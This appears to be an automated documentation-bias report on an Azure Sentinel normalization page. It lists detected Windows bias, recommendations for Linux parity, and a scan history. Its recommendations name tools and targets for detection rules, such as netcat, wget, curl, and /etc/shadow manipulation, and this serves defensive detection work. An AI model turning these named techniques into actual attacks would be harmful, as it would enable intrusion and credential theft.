Document Details

Normalization Content
Home / Scan #237 / Normalization Content
Sad Tux - Windows bias detected
This page contains Windows bias

About This Page

This page is part of the Azure documentation. It contains code examples and configuration instructions for working with Azure services.
GitHub View on GitHub 📚 View on Microsoft Learn

Bias Analysis

Detected Bias Types
powershell_heavy
windows_tools
missing_linux_example
windows_first
Summary
The documentation page demonstrates a noticeable Windows bias. Many examples and hunting queries focus on Windows-specific tools (e.g., PowerShell, rundll32.exe, certutil, Exchange PowerShell Snapin), and several analytic rules and queries are tailored to Windows process activity and registry manipulation. There is a lack of Linux-specific examples, tools, or patterns, and the content prioritizes Windows-centric threats and detection methods. Linux equivalents or cross-platform considerations are missing throughout the document.
Recommendations
  • Add Linux-specific analytic rules and hunting queries, such as detection of suspicious bash scripts, cron job persistence, or common Linux malware behaviors.
  • Include examples of Linux process activity (e.g., suspicious use of bash, sh, systemd, or common Linux binaries like curl, wget, netcat) alongside Windows examples.
  • Provide parity for registry activity by mentioning Linux equivalents (e.g., manipulation of configuration files like /etc/passwd, /etc/shadow, or systemd service files).
  • Balance PowerShell-heavy examples with Linux shell script or command-line examples (e.g., detection of malicious shell scripts, use of sudo, or abuse of system utilities).
  • Explicitly note cross-platform applicability of ASIM where relevant, and clarify which rules or queries are Windows-only versus platform-agnostic.
  • Where possible, reference Linux security tools (e.g., auditd, syslog, journald, SELinux) and how their logs can be normalized and analyzed within ASIM.
GitHub Create Pull Request

Scan History

Date Scan Status Result
2026-01-14 00:00 #250 in_progress Biased Biased
2026-01-13 00:00 #246 completed Biased Biased
2026-01-11 00:00 #240 completed Biased Biased
2026-01-10 00:00 #237 completed Biased Biased
2026-01-09 00:34 #234 completed Clean Clean
2026-01-08 00:53 #231 completed Biased Biased
2026-01-06 18:15 #225 cancelled Clean Clean
2025-08-17 00:01 #83 cancelled Clean Clean
2025-07-13 21:37 #48 completed Biased Biased
2025-07-12 23:44 #41 cancelled Biased Biased